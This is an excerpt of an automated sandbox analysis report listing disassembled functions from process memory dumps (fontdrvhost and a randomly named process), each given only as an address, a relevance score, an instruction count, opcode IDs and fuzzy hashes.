                                                                                            • API String ID:
                                                                                            • Opcode ID: 2ab8194b00b3eaed2826a34b7a92a3ec37158d291b764991f0ec89220e321036
                                                                                            • Instruction ID: 1cf8311eb9b734bcaa284d1cb1860ed01accad0e98290cb0ae57ab0f8ed2dee6
                                                                                            • Opcode Fuzzy Hash: 2ab8194b00b3eaed2826a34b7a92a3ec37158d291b764991f0ec89220e321036
                                                                                            • Instruction Fuzzy Hash: 5B1191B0D0EB4A8FEB69AF38C5193B97BB1AF55310F0451B9E519D72E2CE289841C705
                                                                                            Function 00007FFB4B283F74 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 49009ce7183e4726b4c8e8162492e217f59b491a6649639f7b473c1b3a30864d
                                                                                            • Instruction ID: 23eac858ae830b52ce9ba046167a1dbd1bb0072d217af2f9f0e8b57ffc370d29
                                                                                            • Opcode Fuzzy Hash: 49009ce7183e4726b4c8e8162492e217f59b491a6649639f7b473c1b3a30864d
                                                                                            • Instruction Fuzzy Hash: 2A11A5B0D0DA4A8BEB69BE38C5153BA7AA1EF54310F145539E50ED36D2CE38E8418644
                                                                                            Function 00007FFB4B283F6B Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1aea373c4281cd1f9722107f80e039fb3740c66833db34ec87ff9452d322c191
                                                                                            • Instruction ID: 1ad3804bda29670a86d60685fcfd53d9754efe1a3639589e5ccead0fba859112
                                                                                            • Opcode Fuzzy Hash: 1aea373c4281cd1f9722107f80e039fb3740c66833db34ec87ff9452d322c191
                                                                                            • Instruction Fuzzy Hash: 1D01ADB090E74A8FEB69EF74C5153BABBA1EF85300F04447AD40AD72D2DE38A841DB45
                                                                                            Function 00007FFB4B286680 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 833a8535a91db52d685f7d6adcae16a378dd01902581dffc9e0855fa19c104ae
                                                                                            • Instruction ID: 1bcfe44aee4fed94b246f3e2cf9f82459d6e53321b95826ea55bcd5d9471fc0e
                                                                                            • Opcode Fuzzy Hash: 833a8535a91db52d685f7d6adcae16a378dd01902581dffc9e0855fa19c104ae
                                                                                            • Instruction Fuzzy Hash: 6901DC31848A4C8BCB55AF2A9C002887BA4FB9E318F00136AD44CD7180D7369AAACB41
                                                                                            Function 00007FFB4B2810EA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 143d290fc255c01f54ca3408219249cfed57e8694a1969f2c316421b0e8b0bd2
                                                                                            • Instruction ID: 80f616e11fb6d6791671ab9956ba03066ac3dc8ce8edd4808abdd6862b55a72d
                                                                                            • Opcode Fuzzy Hash: 143d290fc255c01f54ca3408219249cfed57e8694a1969f2c316421b0e8b0bd2
                                                                                            • Instruction Fuzzy Hash: 32E0683280CA4C4BDB91FE68E8066A5FFE0FBC9308F000169E64CD30D1C7249555C384
                                                                                            Function 00007FFB4B2809D3 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 676b606989c7e76c9981bfbd3dbd516a35fac644fb29ba144c3be690f0b96b67
                                                                                            • Instruction ID: 2c9c6cea7b360ffbb3e39635f278c2ad65913c6114935bca4dd75695db0f37df
                                                                                            • Opcode Fuzzy Hash: 676b606989c7e76c9981bfbd3dbd516a35fac644fb29ba144c3be690f0b96b67
                                                                                            • Instruction Fuzzy Hash: FAE04FB192891E8FDB84FFA8D8495EDB7A2FF84240F004635D10CE7162CA24A8048790

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B2857F2 Relevance: 6.5, Strings: 5, Instructions: 241COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O2K$@O2K$PO2K$`O2K$pP2K
                                                                                            • API String ID: 0-92319256
                                                                                            • Opcode ID: 6b10e0b2875c4e3c187cd0289e7fb6e5c26f171abe4cef505b2dbbc1fe7c2a51
                                                                                            • Instruction ID: 8853b038d8748c4b4f1de6c3c004eaddbe5775f161121b1fe21a761ec60c59a8
                                                                                            • Opcode Fuzzy Hash: 6b10e0b2875c4e3c187cd0289e7fb6e5c26f171abe4cef505b2dbbc1fe7c2a51
                                                                                            • Instruction Fuzzy Hash: 8C510D8BB0E6D20BE31676BDF8551E96F90EFC12B234945F7D388CE097A4144D8E42E1

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B2B27F6 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: [$]
                                                                                            • API String ID: 0-2073744556
                                                                                            • Opcode ID: d383e946ca880d1ea10b70a06dcf3c41e2c1166d289063e0686450814a8cb9c1
                                                                                            • Instruction ID: 78b1e40126a56d59c447ea2f07ba13770f19848e9266517628988a9b087ec8ed
                                                                                            • Opcode Fuzzy Hash: d383e946ca880d1ea10b70a06dcf3c41e2c1166d289063e0686450814a8cb9c1
                                                                                            • Instruction Fuzzy Hash: B7810B70918A5D8FDBA9EF28C8856E9BBB5EF58301F1041EED40DD7291CE35AA81CF50
                                                                                            Function 00007FFB4B2B1250 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: b291b04e7ac88c749fe4d45e72275c2103959684643643a2137d9b77b3a94c3a
                                                                                            • Instruction ID: 8434bfa535270f7961f9d18437a262bdc0b7ca3d56fe46d9fa7287d73f4a2a83
                                                                                            • Opcode Fuzzy Hash: b291b04e7ac88c749fe4d45e72275c2103959684643643a2137d9b77b3a94c3a
                                                                                            • Instruction Fuzzy Hash: 3FA19374A18A1C8FDB98EF58C894BA8BBF1FF69301F4541A9D00DE7265DB74AC81CB41
                                                                                            Function 00007FFB4B2B1751 Relevance: .4, Instructions: 385COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 675415e4ae6ae250e0c071fcec563c88346f54cb45bf6820058fefc7777a24d2
                                                                                            • Instruction ID: 76dd3bae8e360d20ad90080a2a3d7f3f6831e49f1e21ebe58f1d0c982504c50c
                                                                                            • Opcode Fuzzy Hash: 675415e4ae6ae250e0c071fcec563c88346f54cb45bf6820058fefc7777a24d2
                                                                                            • Instruction Fuzzy Hash: 48D16CB1D1D6998FDB99EF64C8957E8BBE1EF48301F0440BED049E7292CE386885CB51
                                                                                            Function 00007FFB4B2B0DD9 Relevance: .2, Instructions: 215COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aa94c63fca07244a23d79fbf1b83a75a2845cbb6cc1fa0dabbff5b039258549e
                                                                                            • Instruction ID: b58ee5007d15670b450f04ecdd821e3fda4c69cf620cc7c927281629d6e60fa7
                                                                                            • Opcode Fuzzy Hash: aa94c63fca07244a23d79fbf1b83a75a2845cbb6cc1fa0dabbff5b039258549e
                                                                                            • Instruction Fuzzy Hash: 4671207191894E8FDB45FF68C495AEABBF1FF58300F1446A9D409D7296CE34A882CB90
                                                                                            Function 00007FFB4B2B08B1 Relevance: .2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 831fb81b94ea12ea8a27256863c51ddb2187ead3b2062d0ffbad73ca95b3c15c
                                                                                            • Instruction ID: 3cb2d1f866c76d2ee0accf148de7bbece533a0faa1095a9b714d93a5689cb514
                                                                                            • Opcode Fuzzy Hash: 831fb81b94ea12ea8a27256863c51ddb2187ead3b2062d0ffbad73ca95b3c15c
                                                                                            • Instruction Fuzzy Hash: 3F519DB190CA4E8FEB96FF78C8546AEBBA1FF55300F0445AED409D72A2DE34A841C740
                                                                                            Function 00007FFB4B2B60C5 Relevance: .2, Instructions: 185COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 945c2c4fa6694391c163a20f07bfee1a0155449ade5b0d2b3c6f34eb97b98f5d
                                                                                            • Instruction ID: d97a80899a88082644c66c9d3bc902d8811569c316357477761bc0b4ec96a4b2
                                                                                            • Opcode Fuzzy Hash: 945c2c4fa6694391c163a20f07bfee1a0155449ade5b0d2b3c6f34eb97b98f5d
                                                                                            • Instruction Fuzzy Hash: 5451AEB1D1CA498FEB96FF68C4957A8BFB1FF55300F0081BAC10993292CE386945CB40
                                                                                            Function 00007FFB4B2B190D Relevance: .2, Instructions: 173COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e2a0358b9d1c14f55514e000d3013733f2130df6e9e0cf98ca2dd91299d78a5d
                                                                                            • Instruction ID: e597adb5fe13f05407af503440cddbb0d90dc9771ae58c4d178e16d7bb838f33
                                                                                            • Opcode Fuzzy Hash: e2a0358b9d1c14f55514e000d3013733f2130df6e9e0cf98ca2dd91299d78a5d
                                                                                            • Instruction Fuzzy Hash: CA51C8B1D1995D8FDB99EF68C4A5BA8BBA1FF58301F5440BDD00EE7296CE346881CB01
                                                                                            Function 00007FFB4B2B4611 Relevance: .2, Instructions: 172COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0ccaaab9fd39cba5b35abbeee14cb7c8319b4bd7b2ead735c1da57a9b3c7a91f
                                                                                            • Instruction ID: 281c920c822b3af98b6ab8616d9c1a765538ad50e6557f46aba67a99c8acf1f4
                                                                                            • Opcode Fuzzy Hash: 0ccaaab9fd39cba5b35abbeee14cb7c8319b4bd7b2ead735c1da57a9b3c7a91f
                                                                                            • Instruction Fuzzy Hash: FD51A3B0D18A1D8FDB94EFA8C895BEDBBB1FF58301F10416AD509E7291DB746881CB41
                                                                                            Function 00007FFB4B2B0AB9 Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b420466c0fb1f5e44d8772a3bf6b6e0240b5a63360f43d93f18ea681114a1fe
                                                                                            • Instruction ID: 01c93d6138ccda6e0b8b8a84a06943ddc9c3c9b5fc61e68dec84bf7f5a42ab3f
                                                                                            • Opcode Fuzzy Hash: 0b420466c0fb1f5e44d8772a3bf6b6e0240b5a63360f43d93f18ea681114a1fe
                                                                                            • Instruction Fuzzy Hash: 3451C8B0D18A5D8FDF99EFA8C8546EEBBB2FF58301F14412AD509E7295CB349845CB40
                                                                                            Function 00007FFB4B2B38B8 Relevance: .2, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 87ea846c768ebd364ff24d5d2055d975f0caa9fba6d1ac97c9ea7ca2e840ce41
                                                                                            • Instruction ID: f2d4b241dd3d5e712ed1509a121bdba8a4c50bccb022cf5742dbcecad30a7285
                                                                                            • Opcode Fuzzy Hash: 87ea846c768ebd364ff24d5d2055d975f0caa9fba6d1ac97c9ea7ca2e840ce41
                                                                                            • Instruction Fuzzy Hash: 9041AAB0E1CA0D8FDB45EFA8D841AEEBBB1FF58300F10017AE409E3291DA34A9018B50
                                                                                            Function 00007FFB4B2B67ED Relevance: .1, Instructions: 145COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5480ba09c90ed4bab5f9a91770134dd759eb79a148a05b1004a02b1751278c2d
                                                                                            • Instruction ID: 76d28a3d8f8f39ea189a7343327f43bba63db14328b3f39fddad907b2ef505c6
                                                                                            • Opcode Fuzzy Hash: 5480ba09c90ed4bab5f9a91770134dd759eb79a148a05b1004a02b1751278c2d
                                                                                            • Instruction Fuzzy Hash: 5C5169B1C0D68A8FDB56AF64C8542FEBFB0FF06300F0545AAD544E6192DA285A48CB51
                                                                                            Function 00007FFB4B2B0AD0 Relevance: .1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 11eeaec1591b149b232ac78d780f4c688844d443a9e6d86ebcc85dfab78f4e00
                                                                                            • Instruction ID: e42f2960a28578f8c9ca70d6b6ced9546aee39741f84d0ef7ea462a45a17b964
                                                                                            • Opcode Fuzzy Hash: 11eeaec1591b149b232ac78d780f4c688844d443a9e6d86ebcc85dfab78f4e00
                                                                                            • Instruction Fuzzy Hash: 3431CA7091891D8FDF99EF68C855BEEBBB2FB98305F10412ED509E3295CB349845CB80
                                                                                            Function 00007FFB4B2B4BE9 Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89d296d183fdd14d739c9a80022260d57a4e8d49a2beb012a7a400dd2be70fe4
                                                                                            • Instruction ID: 44b70b6a1785ccaa104973cce641d5055e08cc5b965eef5fd7fc04f8b4e37285
                                                                                            • Opcode Fuzzy Hash: 89d296d183fdd14d739c9a80022260d57a4e8d49a2beb012a7a400dd2be70fe4
                                                                                            • Instruction Fuzzy Hash: 4C416BB0D0D6598FE755EFB8C8956E9BBB1FF45301F4041BAD009D72A2CA389881CB40
                                                                                            Function 00007FFB4B2B3F00 Relevance: .1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction ID: 85acf573275d38f1fae65c926555df358e7d8d094002cb9c448600fda9c73a55
                                                                                            • Opcode Fuzzy Hash: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction Fuzzy Hash: 38312B70D0D61A8BEBA9EE24C5593B9B6A1EF54300F1045BDD95DD32A2CE38A981CB40
                                                                                            Function 00007FFB4B2B3F0B Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d5fa7b6cef9e535976e6fdfce9775b22612c0c6fda95c9da3c6eaaab1ea05d18
                                                                                            • Instruction ID: ca52b237813064ae153106544972b360c91db2995fdd3e7fdb06b85cb8038686
                                                                                            • Opcode Fuzzy Hash: d5fa7b6cef9e535976e6fdfce9775b22612c0c6fda95c9da3c6eaaab1ea05d18
                                                                                            • Instruction Fuzzy Hash: 0A2160B1D0D60A8AEB68FF74C9556B97BB1EF84310F10447ED61E932E2DE38A941CB40
                                                                                            Function 00007FFB4B2B3FC1 Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86bdf8977953bfab2f747c2ae1002e87a96844bc3e892db6643eba56ff223e01
                                                                                            • Instruction ID: 51f8b958882c961d3bb50f4d9fcdea2774e11db0a548e3fe558062c4d3927469
                                                                                            • Opcode Fuzzy Hash: 86bdf8977953bfab2f747c2ae1002e87a96844bc3e892db6643eba56ff223e01
                                                                                            • Instruction Fuzzy Hash: 8A118BB090E78A4EEB6AAF74C8247B97FB1AF86310F0844BAD549D72D3CD289845C751
                                                                                            Function 00007FFB4B2B3EEC Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82e09e758cbe108aa713da79ef1dd683c5358352f4b2aebc520f842c94b5c87a
                                                                                            • Instruction ID: 132fd71ac38521193d1468a3e13d839dc56b27e734edc9e3f5b02b432c91d9e3
                                                                                            • Opcode Fuzzy Hash: 82e09e758cbe108aa713da79ef1dd683c5358352f4b2aebc520f842c94b5c87a
                                                                                            • Instruction Fuzzy Hash: 5C1191B0D0EB4A8FE769AF38C5193B97BB1AF45310F0454BDD619D32E2CE3858418705
                                                                                            Function 00007FFB4B2B10EA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1ed5de6d740f9cc24e51fefd1947ef30a32546f5c74e09542ad89017d6e6dc08
                                                                                            • Instruction ID: 818783ba23b71484093491ebc72d6cf9ae93bc67bb78083c04bca9f7396efc2e
                                                                                            • Opcode Fuzzy Hash: 1ed5de6d740f9cc24e51fefd1947ef30a32546f5c74e09542ad89017d6e6dc08
                                                                                            • Instruction Fuzzy Hash: 27E0D87692CA4D4BDB90FF69E8066A5FFE0FBC5309F00006DE65CD3191C62595A5C385
                                                                                            Function 00007FFB4B2B09D3 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000038.00000002.2342561316.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_56_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 62486763eaf22c640d67de1f9df81cdcc015d97db1550f01c7e5968d2caecc5e
                                                                                            • Instruction ID: 6a2869260d52ea7a2c0ca52cf5567c1038eb1f90cb3706131c91d96e433a131e
                                                                                            • Opcode Fuzzy Hash: 62486763eaf22c640d67de1f9df81cdcc015d97db1550f01c7e5968d2caecc5e
                                                                                            • Instruction Fuzzy Hash: 43E04F71D2891E4FDB85FFA8D8455FDB7A2FB88340F00413AD10DE3152CE206804C780